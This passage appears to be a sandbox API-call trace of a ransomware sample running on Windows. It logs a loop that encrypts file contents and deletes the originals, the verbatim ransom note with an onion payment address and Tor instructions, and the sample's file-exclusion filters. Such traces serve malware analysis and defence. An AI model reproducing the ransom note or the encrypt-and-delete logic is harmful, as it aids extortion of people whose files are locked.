lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.166] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.166] GetLastError () returned 0x0 [0159.166] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.166] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.166] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.166] GetLastError () returned 0x0 [0159.166] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.166] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.166] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.166] GetLastError () returned 0x0 [0159.166] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.166] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.166] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.166] GetLastError () returned 0x0 [0159.166] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.166] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.166] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.166] GetLastError () returned 0x0 [0159.166] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.166] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.166] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.166] GetLastError () returned 0x0 [0159.166] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.167] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.167] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.167] GetLastError () returned 0x0 [0159.167] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.167] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.167] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.167] GetLastError () returned 0x0 [0159.167] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.167] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.167] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.167] GetLastError () returned 0x0 [0159.167] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.167] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.167] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui")) returned 0x20 [0159.173] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.173] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui") returned 1 [0159.173] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui")) returned 0 [0159.173] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" [0159.173] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU") returned 1 [0159.173] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\.xXE112.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\.xxe112.tmp")) returned 0xe112 [0159.174] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\.xXE112.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\.xxe112.tmp"), dwFlags=0x1) returned 0 [0159.174] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\.xXE112.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\.xxe112.tmp")) returned 1 [0159.174] CryptDestroyKey (hKey=0x9ad538) returned 1 [0159.174] wcslen (_String="OK") returned 0x2 [0159.174] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.174] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.174] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0159.174] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0159.174] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0159.174] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.175] GetLastError () returned 0x12 [0159.175] FindClose (in: hFindFile=0x9ad738 | out: hFindFile=0x9ad738) returned 1 [0159.175] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.175] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.175] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.176] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.176] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.176] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.176] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.176] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.176] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*.exe") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*.dll") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*.lnk") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*.bat") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*.ini") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*.msi") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*.scf") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*pagefile.sys*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*AppData*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*\\winrar\\*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*\\java\\*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*\\windows\\*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*\\ESET\\*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*\\AVG\\*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*Atheros*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*Realtek*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*bootmgr*") returned 0 [0159.176] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*boot*") returned 0 [0159.177] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*boot*") returned 0 [0159.177] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.177] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*IO.SYS*") returned 0 [0159.177] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.177] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.177] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*ntldr*") returned 0 [0159.177] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*chrome*") returned 0 [0159.177] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*opera*") returned 0 [0159.177] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", pszSpec="*firefox*") returned 0 [0159.177] wcslen (_String="\\\\?\\") returned 0x4 [0159.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad838 [0159.177] wcscmp (_String1=".", _String2=".") returned 0 [0159.177] FindNextFileW (in: hFindFile=0x9ad838, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.177] wcscmp (_String1="..", _String2=".") returned 1 [0159.177] wcscmp (_String1="..", _String2="..") returned 0 [0159.177] FindNextFileW (in: hFindFile=0x9ad838, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.177] GetLastError () returned 0x12 [0159.177] FindClose (in: hFindFile=0x9ad838 | out: hFindFile=0x9ad838) returned 1 [0159.179] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.179] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.179] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.179] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.179] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.179] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.179] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*.exe") returned 0 [0159.179] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*.dll") returned 0 [0159.179] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*.lnk") returned 0 [0159.179] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*.bat") returned 0 [0159.179] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*.ini") returned 0 [0159.179] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*.msi") returned 0 [0159.179] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*.scf") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*pagefile.sys*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*AppData*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*\\winrar\\*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*\\java\\*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*\\windows\\*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*\\ESET\\*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*\\AVG\\*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*Atheros*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*Realtek*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*bootmgr*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*boot*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*boot*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*IO.SYS*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*ntldr*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*chrome*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*opera*") returned 0 [0159.180] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", pszSpec="*firefox*") returned 0 [0159.180] wcslen (_String="\\\\?\\") returned 0x4 [0159.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad338 [0159.180] wcscmp (_String1=".", _String2=".") returned 0 [0159.180] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.180] wcscmp (_String1="..", _String2=".") returned 1 [0159.180] wcscmp (_String1="..", _String2="..") returned 0 [0159.180] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.180] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.180] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.180] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.180] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.180] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.180] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.180] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.180] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", 